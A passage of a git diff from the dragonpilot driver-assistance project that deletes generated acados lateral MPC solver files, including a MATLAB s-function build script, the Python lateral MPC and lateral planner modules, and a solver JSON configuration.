int* iw, real_t* w, void *mem); -int lat_expl_ode_fun_work(int *, int *, int *, int *); -const int *lat_expl_ode_fun_sparsity_in(int); -const int *lat_expl_ode_fun_sparsity_out(int); -int lat_expl_ode_fun_n_in(void); -int lat_expl_ode_fun_n_out(void); - -// explicit forward VDE -int lat_expl_vde_forw(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_expl_vde_forw_work(int *, int *, int *, int *); -const int *lat_expl_vde_forw_sparsity_in(int); -const int *lat_expl_vde_forw_sparsity_out(int); -int lat_expl_vde_forw_n_in(void); -int lat_expl_vde_forw_n_out(void); - -// explicit adjoint VDE -int lat_expl_vde_adj(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_expl_vde_adj_work(int *, int *, int *, int *); -const int *lat_expl_vde_adj_sparsity_in(int); -const int *lat_expl_vde_adj_sparsity_out(int); -int lat_expl_vde_adj_n_in(void); -int lat_expl_vde_adj_n_out(void); - - - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // lat_MODEL diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/libacados_ocp_solver_lat.so b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/libacados_ocp_solver_lat.so deleted file mode 100755 index 81f694203..000000000 Binary files a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/libacados_ocp_solver_lat.so and /dev/null differ diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/make_sfun_lat.m b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/make_sfun_lat.m deleted file mode 100644 index 30301675c..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/make_sfun_lat.m +++ /dev/null @@ -1,125 +0,0 @@ -% -% Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, -% Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, -% Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, -% Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl -% -% This file is part of acados. -% -% The 2-Clause BSD License -% -% Redistribution and use in source and binary forms, with or without -% modification, are permitted provided that the following conditions are met: -% -% 1. Redistributions of source code must retain the above copyright notice, -% this list of conditions and the following disclaimer. -% -% 2. Redistributions in binary form must reproduce the above copyright notice, -% this list of conditions and the following disclaimer in the documentation -% and/or other materials provided with the distribution. -% -% THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -% AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -% IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -% ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -% LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -% CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -% SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -% INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -% CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -% ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -% POSSIBILITY OF SUCH DAMAGE.; -% - -SOURCES = { ... - 'lat_model/lat_expl_ode_fun.c', ... - 'lat_model/lat_expl_vde_forw.c',... - 'lat_cost/lat_cost_y_0_fun.c',... - 'lat_cost/lat_cost_y_0_fun_jac_ut_xt.c',... - 'lat_cost/lat_cost_y_0_hess.c',... - 'lat_cost/lat_cost_y_fun.c',... - 'lat_cost/lat_cost_y_fun_jac_ut_xt.c',... - 'lat_cost/lat_cost_y_hess.c',... - 'lat_cost/lat_cost_y_e_fun.c',... - 'lat_cost/lat_cost_y_e_fun_jac_ut_xt.c',... - 'lat_cost/lat_cost_y_e_hess.c',... - 'acados_solver_sfunction_lat.c', ... - 'acados_solver_lat.c' - }; - -INC_PATH = '/data/openpilot/third_party/acados/include'; - -INCS = {['-I', fullfile(INC_PATH, 'blasfeo', 'include')], ... - ['-I', fullfile(INC_PATH, 'hpipm', 'include')], ... - ['-I', fullfile(INC_PATH, 'acados')], ... - ['-I', fullfile(INC_PATH)]}; - - - -CFLAGS = 'CFLAGS=$CFLAGS'; -LDFLAGS = 'LDFLAGS=$LDFLAGS'; -COMPFLAGS = 'COMPFLAGS=$COMPFLAGS'; -COMPDEFINES = 'COMPDEFINES=$COMPDEFINES'; - - - -LIB_PATH = ['-L', fullfile('/data/openpilot/third_party/acados/lib')]; - -LIBS = {'-lacados', '-lhpipm', '-lblasfeo'}; - -% acados linking libraries and flags - - -mex('-v', '-O', CFLAGS, LDFLAGS, COMPFLAGS, COMPDEFINES, INCS{:}, ... - LIB_PATH, LIBS{:}, SOURCES{:}, ... - '-output', 'acados_solver_sfunction_lat' ); - -fprintf( [ '\n\nSuccessfully created sfunction:\nacados_solver_sfunction_lat', '.', ... - eval('mexext')] ); - - -%% print note on usage of s-function -fprintf('\n\nNote: Usage of Sfunction is as follows:\n') -input_note = 'Inputs are:\n'; -i_in = 1; -input_note = strcat(input_note, num2str(i_in), ') lbx_0 - lower bound on x for stage 0,',... - ' size [4]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') ubx_0 - upper bound on x for stage 0,',... - ' size [4]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') parameters - concatenated for all shooting nodes 0 to N+1,',... - ' size [34]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') y_ref_0, size [3]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') y_ref - concatenated for shooting nodes 1 to N-1,',... - ' size [45]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') y_ref_e, size [2]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') lbx for shooting nodes 1 to N-1, size [30]\n '); -i_in = i_in + 1; -input_note = strcat(input_note, num2str(i_in), ') ubx for shooting nodes 1 to N-1, size [30]\n '); -i_in = i_in + 1; - -fprintf(input_note) - -disp(' ') - -output_note = 'Outputs are:\n'; -i_out = 0; -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') u0, control input at node 0, size [1]\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') acados solver status (0 = SUCCESS)\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') KKT residual\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') x1, state at node 1\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') CPU time\n '); -i_out = i_out + 1; -output_note = strcat(output_note, num2str(i_out), ') SQP iterations\n '); - -fprintf(output_note) diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/lat_mpc.py b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/lat_mpc.py deleted file mode 100755 index 881fcc599..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/lat_mpc.py +++ /dev/null @@ -1,179 +0,0 @@ -#!/usr/bin/env python3 -import os -import numpy as np - -from casadi import SX, vertcat, sin, cos - -from common.realtime import sec_since_boot -from selfdrive.controls.lib.drive_helpers import LAT_MPC_N as N -from selfdrive.modeld.constants import T_IDXS - -if __name__ == '__main__': # generating code - from third_party.acados.acados_template import AcadosModel, AcadosOcp, AcadosOcpSolver -else: - from selfdrive.dragonpilot.controls_0813.lib.lateral_mpc_lib.c_generated_code.acados_ocp_solver_pyx import AcadosOcpSolverCython # pylint: disable=no-name-in-module, import-error - -LAT_MPC_DIR = os.path.dirname(os.path.abspath(__file__)) -EXPORT_DIR = os.path.join(LAT_MPC_DIR, "c_generated_code") -JSON_FILE = os.path.join(LAT_MPC_DIR, "acados_ocp_lat.json") -X_DIM = 4 -P_DIM = 2 -MODEL_NAME = 'lat' -ACADOS_SOLVER_TYPE = 'SQP_RTI' - -def gen_lat_model(): - model = AcadosModel() - model.name = MODEL_NAME - - # set up states & controls - x_ego = SX.sym('x_ego') - y_ego = SX.sym('y_ego') - psi_ego = SX.sym('psi_ego') - curv_ego = SX.sym('curv_ego') - model.x = vertcat(x_ego, y_ego, psi_ego, curv_ego) - - # parameters - v_ego = SX.sym('v_ego') - rotation_radius = SX.sym('rotation_radius') - model.p = vertcat(v_ego, rotation_radius) - - # controls - curv_rate = SX.sym('curv_rate') - model.u = vertcat(curv_rate) - - # xdot - x_ego_dot = SX.sym('x_ego_dot') - y_ego_dot = SX.sym('y_ego_dot') - psi_ego_dot = SX.sym('psi_ego_dot') - curv_ego_dot = SX.sym('curv_ego_dot') - - model.xdot = vertcat(x_ego_dot, y_ego_dot, psi_ego_dot, curv_ego_dot) - - # dynamics model - f_expl = vertcat(v_ego * cos(psi_ego) - rotation_radius * sin(psi_ego) * (v_ego * curv_ego), - v_ego * sin(psi_ego) + rotation_radius * cos(psi_ego) * (v_ego * curv_ego), - v_ego * curv_ego, - curv_rate) - model.f_impl_expr = model.xdot - f_expl - model.f_expl_expr = f_expl - return model - - -def gen_lat_ocp(): - ocp = AcadosOcp() - ocp.model = gen_lat_model() - - Tf = np.array(T_IDXS)[N] - - # set dimensions - ocp.dims.N = N - - # set cost module - ocp.cost.cost_type = 'NONLINEAR_LS' - ocp.cost.cost_type_e = 'NONLINEAR_LS' - - Q = np.diag([0.0, 0.0]) - QR = np.diag([0.0, 0.0, 0.0]) - - ocp.cost.W = QR - ocp.cost.W_e = Q - - y_ego, psi_ego = ocp.model.x[1], ocp.model.x[2] - curv_rate = ocp.model.u[0] - v_ego = ocp.model.p[0] - - ocp.parameter_values = np.zeros((P_DIM, )) - - ocp.cost.yref = np.zeros((3, )) - ocp.cost.yref_e = np.zeros((2, )) - # TODO hacky weights to keep behavior the same - ocp.model.cost_y_expr = vertcat(y_ego, - ((v_ego +5.0) * psi_ego), - ((v_ego +5.0) * 4 * curv_rate)) - ocp.model.cost_y_expr_e = vertcat(y_ego, - ((v_ego +5.0) * psi_ego)) - - # set constraints - ocp.constraints.constr_type = 'BGH' - ocp.constraints.idxbx = np.array([2,3]) - ocp.constraints.ubx = np.array([np.radians(90), np.radians(50)]) - ocp.constraints.lbx = np.array([-np.radians(90), -np.radians(50)]) - x0 = np.zeros((X_DIM,)) - ocp.constraints.x0 = x0 - - ocp.solver_options.qp_solver = 'PARTIAL_CONDENSING_HPIPM' - ocp.solver_options.hessian_approx = 'GAUSS_NEWTON' - ocp.solver_options.integrator_type = 'ERK' - ocp.solver_options.nlp_solver_type = ACADOS_SOLVER_TYPE - ocp.solver_options.qp_solver_iter_max = 1 - ocp.solver_options.qp_solver_cond_N = 1 - - # set prediction horizon - ocp.solver_options.tf = Tf - ocp.solver_options.shooting_nodes = np.array(T_IDXS)[:N+1] - - ocp.code_export_directory = EXPORT_DIR - return ocp - - -class LateralMpc(): - def __init__(self, x0=np.zeros(X_DIM)): - self.solver = AcadosOcpSolverCython(MODEL_NAME, ACADOS_SOLVER_TYPE, N) - self.reset(x0) - - def reset(self, x0=np.zeros(X_DIM)): - self.x_sol = np.zeros((N+1, X_DIM)) - self.u_sol = np.zeros((N, 1)) - self.yref = np.zeros((N+1, 3)) - for i in range(N): - self.solver.cost_set(i, "yref", self.yref[i]) - self.solver.cost_set(N, "yref", self.yref[N][:2]) - - # Somehow needed for stable init - for i in range(N+1): - self.solver.set(i, 'x', np.zeros(X_DIM)) - self.solver.set(i, 'p', np.zeros(P_DIM)) - self.solver.constraints_set(0, "lbx", x0) - self.solver.constraints_set(0, "ubx", x0) - self.solver.solve() - self.solution_status = 0 - self.solve_time = 0.0 - self.cost = 0 - - def set_weights(self, path_weight, heading_weight, steer_rate_weight): - W = np.asfortranarray(np.diag([path_weight, heading_weight, steer_rate_weight])) - for i in range(N): - self.solver.cost_set(i, 'W', W) - #TODO hacky weights to keep behavior the same - self.solver.cost_set(N, 'W', (3/20.)*W[:2,:2]) - - def run(self, x0, p, y_pts, heading_pts): - x0_cp = np.copy(x0) - p_cp = np.copy(p) - self.solver.constraints_set(0, "lbx", x0_cp) - self.solver.constraints_set(0, "ubx", x0_cp) - self.yref[:,0] = y_pts - v_ego = p_cp[0] - # rotation_radius = p_cp[1] - self.yref[:,1] = heading_pts*(v_ego+5.0) - for i in range(N): - self.solver.cost_set(i, "yref", self.yref[i]) - self.solver.set(i, "p", p_cp) - self.solver.set(N, "p", p_cp) - self.solver.cost_set(N, "yref", self.yref[N][:2]) - - t = sec_since_boot() - self.solution_status = self.solver.solve() - self.solve_time = sec_since_boot() - t - - for i in range(N+1): - self.x_sol[i] = self.solver.get(i, 'x') - for i in range(N): - self.u_sol[i] = self.solver.get(i, 'u') - self.cost = self.solver.get_cost() - - -if __name__ == "__main__": - ocp = gen_lat_ocp() - AcadosOcpSolver.generate(ocp, json_file=JSON_FILE) - # AcadosOcpSolver.build(ocp.code_export_directory, with_cython=True) diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_planner.py b/selfdrive/dragonpilot/controls_0813/lib/lateral_planner.py deleted file mode 100644 index 01365bf31..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_planner.py +++ /dev/null @@ -1,152 +0,0 @@ -import numpy as np -from common.realtime import sec_since_boot, DT_MDL -from common.numpy_fast import interp -from system.swaglog import cloudlog -from selfdrive.dragonpilot.controls_0813.lib.lateral_mpc_lib.lat_mpc import LateralMpc -from selfdrive.controls.lib.drive_helpers import CONTROL_N, MPC_COST_LAT, LAT_MPC_N, CAR_ROTATION_RADIUS, get_lane_laneless_mode -from selfdrive.controls.lib.lane_planner import LanePlanner, TRAJECTORY_SIZE -from selfdrive.controls.lib.desire_helper import DesireHelper -import cereal.messaging as messaging -from cereal import log -from selfdrive.hardware import TICI -from common.params import Params - - -class LateralPlanner: - def __init__(self, CP): - self.LP = LanePlanner() - self.DH = DesireHelper() - - self.last_cloudlog_t = 0 - try: - self.steer_rate_cost = float(Params().get("dp_lateral_steer_rate_cost").decode('utf-8')) - except: - self.steer_rate_cost = 1.0 - self.solution_invalid_cnt = 0 - - self.path_xyz = np.zeros((TRAJECTORY_SIZE, 3)) - self.path_xyz_stds = np.ones((TRAJECTORY_SIZE, 3)) - self.plan_yaw = np.zeros((TRAJECTORY_SIZE,)) - self.t_idxs = np.arange(TRAJECTORY_SIZE) - self.y_pts = np.zeros(TRAJECTORY_SIZE) - self.d_path_xyz = np.zeros((TRAJECTORY_SIZE, 3)) - - self.lat_mpc = LateralMpc() - self.reset_mpc(np.zeros(4)) - - # dp - self.dp_lanelines_enable = False - self.dp_lanelines_active = False - self.dp_camera_offset = 4 if TICI else -6 - self.dp_path_offset = 4 if TICI else 0 - - def reset_mpc(self, x0=np.zeros(4)): - self.x0 = x0 - self.lat_mpc.reset(x0=self.x0) - - def update(self, sm): - v_ego = sm['carState'].vEgo - measured_curvature = sm['controlsState'].curvature - if sm.updated['dragonConf']: - self.dp_lanelines_enable = sm['dragonConf'].dpLateralLanelines - self.dp_camera_offset = sm['dragonConf'].dpLateralCameraOffset - self.dp_path_offset = sm['dragonConf'].dpLateralPathOffset - if sm['dragonConf'].dpLateralAltLanelines and sm['controlsState'].dpLateralAltActive: - self.dp_lanelines_enable = True - self.dp_camera_offset = sm['dragonConf'].dpLateralAltCameraOffset - self.dp_path_offset = sm['dragonConf'].dpLateralAltPathOffset - - # Parse model predictions - md = sm['modelV2'] - # update camera/path offset to lane planner - self.LP.update_dp_camera_offsets(self.dp_camera_offset, self.dp_path_offset) - # Parse model predictions - self.LP.parse_model(md) - if len(md.position.x) == TRAJECTORY_SIZE and len(md.orientation.x) == TRAJECTORY_SIZE: - self.path_xyz = np.column_stack([md.position.x, md.position.y, md.position.z]) - self.t_idxs = np.array(md.position.t) - self.plan_yaw = list(md.orientation.z) - if len(md.position.xStd) == TRAJECTORY_SIZE: - self.path_xyz_stds = np.column_stack([md.position.xStd, md.position.yStd, md.position.zStd]) - - # Lane change logic - lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob - self.DH.update(sm['carState'], sm['carControl'].latActive, lane_change_prob, sm['dragonConf'], md) - - # Turn off lanes during lane change - if self.DH.desire == log.LateralPlan.Desire.laneChangeRight or self.DH.desire == log.LateralPlan.Desire.laneChangeLeft: - self.LP.lll_prob *= self.DH.lane_change_ll_prob - self.LP.rll_prob *= self.DH.lane_change_ll_prob - - # dynamic laneline/laneless logic - # decide if we want to use lanelines or laneless - if self.dp_lanelines_enable: - self.dp_lanelines_active = get_lane_laneless_mode(self.LP.lll_prob, self.LP.rll_prob, self.dp_lanelines_active) - else: - self.dp_lanelines_active = False - - # Calculate final driving path and set MPC costs - if self.dp_lanelines_active: - self.d_path_xyz = self.LP.get_d_path(v_ego, self.t_idxs, self.path_xyz) - self.lat_mpc.set_weights(MPC_COST_LAT.PATH, MPC_COST_LAT.HEADING, self.steer_rate_cost) - else: - self.d_path_xyz = self.path_xyz - path_cost = np.clip(abs(self.path_xyz[0, 1] / self.path_xyz_stds[0, 1]), 0.5, 1.5) * MPC_COST_LAT.PATH - # Heading cost is useful at low speed, otherwise end of plan can be off-heading - heading_cost = interp(v_ego, [5.0, 10.0], [MPC_COST_LAT.HEADING, 0.0]) - self.lat_mpc.set_weights(path_cost, heading_cost, self.steer_rate_cost) - - y_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.d_path_xyz, axis=1), self.d_path_xyz[:, 1]) - heading_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.path_xyz, axis=1), self.plan_yaw) - self.y_pts = y_pts - - assert len(y_pts) == LAT_MPC_N + 1 - assert len(heading_pts) == LAT_MPC_N + 1 - # self.x0[4] = v_ego - p = np.array([v_ego, CAR_ROTATION_RADIUS]) - self.lat_mpc.run(self.x0, - p, - y_pts, - heading_pts) - # init state for next - self.x0[3] = interp(DT_MDL, self.t_idxs[:LAT_MPC_N + 1], self.lat_mpc.x_sol[:, 3]) - - # Check for infeasible MPC solution - mpc_nans = np.isnan(self.lat_mpc.x_sol[:, 3]).any() - t = sec_since_boot() - if mpc_nans or self.lat_mpc.solution_status != 0: - self.reset_mpc() - self.x0[3] = measured_curvature - if t > self.last_cloudlog_t + 5.0: - self.last_cloudlog_t = t - cloudlog.warning("Lateral mpc - nan: True") - - if self.lat_mpc.cost > 20000. or mpc_nans: - self.solution_invalid_cnt += 1 - else: - self.solution_invalid_cnt = 0 - - def publish(self, sm, pm): - plan_solution_valid = self.solution_invalid_cnt < 2 - plan_send = messaging.new_message('lateralPlan') - plan_send.valid = sm.all_checks(service_list=['carState', 'controlsState', 'modelV2']) - - lateralPlan = plan_send.lateralPlan - lateralPlan.modelMonoTime = sm.logMonoTime['modelV2'] - lateralPlan.dPathPoints = self.y_pts.tolist() - lateralPlan.psis = self.lat_mpc.x_sol[0:CONTROL_N, 2].tolist() - lateralPlan.curvatures = self.lat_mpc.x_sol[0:CONTROL_N, 3].tolist() - lateralPlan.curvatureRates = [float(x) for x in self.lat_mpc.u_sol[0:CONTROL_N - 1]] + [0.0] - - lateralPlan.mpcSolutionValid = bool(plan_solution_valid) - lateralPlan.solverExecutionTime = self.lat_mpc.solve_time - - lateralPlan.desire = self.DH.desire - lateralPlan.useLaneLines = self.dp_lanelines_active - lateralPlan.laneChangeState = self.DH.lane_change_state - lateralPlan.laneChangeDirection = self.DH.lane_change_direction - - plan_send.lateralPlan.dPathWLinesX = [float(x) for x in self.d_path_xyz[:, 0]] - plan_send.lateralPlan.dPathWLinesY = [float(y) for y in self.d_path_xyz[:, 1]] - - pm.send('lateralPlan', plan_send) diff --git a/selfdrive/dragonpilot/controls_0816/lib/__init__.py b/selfdrive/dragonpilot/controls_0816/lib/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/.gitignore b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/.gitignore deleted file mode 100644 index aff2eb082..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/.gitignore +++ /dev/null @@ -1,2 +0,0 @@ -acados_ocp_lat.json -c_generated_code/ diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/__init__.py b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/acados_ocp_lat.json b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/acados_ocp_lat.json deleted file mode 100644 index 7f74d8810..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/acados_ocp_lat.json +++ /dev/null @@ -1,450 +0,0 @@ -{ - "acados_include_path": "/data/openpilot/third_party/acados/include", - "acados_lib_path": "/data/openpilot/third_party/acados/lib", - "code_export_directory": "/data/openpilot/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code", - "constraints": { - "C": [], - "C_e": [], - "D": [], - "constr_type": "BGH", - "constr_type_e": "BGH", - "idxbu": [], - "idxbx": [ - 2, - 3 - ], - "idxbx_0": [ - 0, - 1, - 2, - 3 - ], - "idxbx_e": [], - "idxbxe_0": [ - 0, - 1, - 2, - 3 - ], - "idxsbu": [], - "idxsbx": [], - "idxsbx_e": [], - "idxsg": [], - "idxsg_e": [], - "idxsh": [], - "idxsh_e": [], - "idxsphi": [], - "idxsphi_e": [], - "lbu": [], - "lbx": [ - -1.5707963267948966, - -0.8726646259971648 - ], - "lbx_0": [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - "lbx_e": [], - "lg": [], - "lg_e": [], - "lh": [], - "lh_e": [], - "lphi": [], - "lphi_e": [], - "lsbu": [], - "lsbx": [], - "lsbx_e": [], - "lsg": [], - "lsg_e": [], - "lsh": [], - "lsh_e": [], - "lsphi": [], - "lsphi_e": [], - "ubu": [], - "ubx": [ - 1.5707963267948966, - 0.8726646259971648 - ], - "ubx_0": [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - "ubx_e": [], - "ug": [], - "ug_e": [], - "uh": [], - "uh_e": [], - "uphi": [], - "uphi_e": [], - "usbu": [], - "usbx": [], - "usbx_e": [], - "usg": [], - "usg_e": [], - "ush": [], - "ush_e": [], - "usphi": [], - "usphi_e": [] - }, - "cost": { - "Vu": [ - [ - 0.0 - ], - [ - 0.0 - ], - [ - 0.0 - ] - ], - "Vu_0": [ - [ - 0.0 - ], - [ - 0.0 - ], - [ - 0.0 - ] - ], - "Vx": [ - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ] - ], - "Vx_0": [ - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ] - ], - "Vx_e": [ - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ] - ], - "Vz": [], - "Vz_0": [], - "W": [ - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ] - ], - "W_0": [ - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ] - ], - "W_e": [ - [ - 0.0, - 0.0 - ], - [ - 0.0, - 0.0 - ] - ], - "Zl": [], - "Zl_e": [], - "Zu": [], - "Zu_e": [], - "cost_ext_fun_type": "casadi", - "cost_ext_fun_type_0": "casadi", - "cost_ext_fun_type_e": "casadi", - "cost_type": "NONLINEAR_LS", - "cost_type_0": "NONLINEAR_LS", - "cost_type_e": "NONLINEAR_LS", - "yref": [ - 0.0, - 0.0, - 0.0 - ], - "yref_0": [ - 0.0, - 0.0, - 0.0 - ], - "yref_e": [ - 0.0, - 0.0 - ], - "zl": [], - "zl_e": [], - "zu": [], - "zu_e": [] - }, - "cython_include_dirs": "/usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include", - "dims": { - "N": 16, - "nbu": 0, - "nbx": 2, - "nbx_0": 4, - "nbx_e": 0, - "nbxe_0": 4, - "ng": 0, - "ng_e": 0, - "nh": 0, - "nh_e": 0, - "np": 2, - "nphi": 0, - "nphi_e": 0, - "nr": 0, - "nr_e": 0, - "ns": 0, - "ns_e": 0, - "nsbu": 0, - "nsbx": 0, - "nsbx_e": 0, - "nsg": 0, - "nsg_e": 0, - "nsh": 0, - "nsh_e": 0, - "nsphi": 0, - "nsphi_e": 0, - "nu": 1, - "nx": 4, - "ny": 3, - "ny_0": 3, - "ny_e": 2, - "nz": 0 - }, - "model": { - "dyn_disc_fun": null, - "dyn_disc_fun_jac": null, - "dyn_disc_fun_jac_hess": null, - "dyn_ext_fun_type": "casadi", - "dyn_source_discrete": null, - "gnsf": { - "nontrivial_f_LO": 1, - "purely_linear": 0 - }, - "name": "lat" - }, - "parameter_values": [ - 0.0, - 0.0 - ], - "problem_class": "OCP", - "simulink_opts": { - "inputs": { - "cost_W": 0, - "cost_W_0": 0, - "cost_W_e": 0, - "lbu": 1, - "lbx": 1, - "lbx_0": 1, - "lbx_e": 1, - "lg": 1, - "lh": 1, - "parameter_traj": 1, - "reset_solver": 0, - "u_init": 0, - "ubu": 1, - "ubx": 1, - "ubx_0": 1, - "ubx_e": 1, - "ug": 1, - "uh": 1, - "x_init": 0, - "y_ref": 1, - "y_ref_0": 1, - "y_ref_e": 1 - }, - "outputs": { - "CPU_time": 1, - "CPU_time_lin": 0, - "CPU_time_qp": 0, - "CPU_time_sim": 0, - "KKT_residual": 1, - "solver_status": 1, - "sqp_iter": 1, - "u0": 1, - "utraj": 0, - "x1": 1, - "xtraj": 0 - }, - "samplingtime": "t0" - }, - "solver_options": { - "Tsim": 0.009765625, - "alpha_min": 0.05, - "alpha_reduction": 0.7, - "collocation_type": "GAUSS_LEGENDRE", - "eps_sufficient_descent": 0.0001, - "exact_hess_constr": 1, - "exact_hess_cost": 1, - "exact_hess_dyn": 1, - "ext_cost_num_hess": 0, - "full_step_dual": 0, - "globalization": "FIXED_STEP", - "globalization_use_SOC": 0, - "hessian_approx": "GAUSS_NEWTON", - "hpipm_mode": "BALANCE", - "initialize_t_slacks": 0, - "integrator_type": "ERK", - "levenberg_marquardt": 0.0, - "line_search_use_sufficient_descent": 0, - "model_external_shared_lib_dir": null, - "model_external_shared_lib_name": null, - "nlp_solver_max_iter": 100, - "nlp_solver_step_length": 1.0, - "nlp_solver_tol_comp": 1e-06, - "nlp_solver_tol_eq": 1e-06, - "nlp_solver_tol_ineq": 1e-06, - "nlp_solver_tol_stat": 1e-06, - "nlp_solver_type": "SQP_RTI", - "print_level": 0, - "qp_solver": "PARTIAL_CONDENSING_HPIPM", - "qp_solver_cond_N": 1, - "qp_solver_iter_max": 1, - "qp_solver_tol_comp": null, - "qp_solver_tol_eq": null, - "qp_solver_tol_ineq": null, - "qp_solver_tol_stat": null, - "qp_solver_warm_start": 0, - "regularize_method": null, - "sim_method_jac_reuse": [ - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0 - ], - "sim_method_newton_iter": 3, - "sim_method_num_stages": [ - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4 - ], - "sim_method_num_steps": [ - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1 - ], - "tf": 2.5, - "time_steps": [ - 0.009765625, - 0.029296875, - 0.048828125, - 0.068359375, - 0.087890625, - 0.107421875, - 0.126953125, - 0.146484375, - 0.166015625, - 0.185546875, - 0.205078125, - 0.224609375, - 0.244140625, - 0.263671875, - 0.283203125, - 0.302734375 - ] - } -} \ No newline at end of file diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/Makefile b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/Makefile deleted file mode 100644 index d022941d7..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/Makefile +++ /dev/null @@ -1,179 +0,0 @@ -# -# Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, -# Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, -# Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, -# Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl -# -# This file is part of acados. -# -# The 2-Clause BSD License -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR 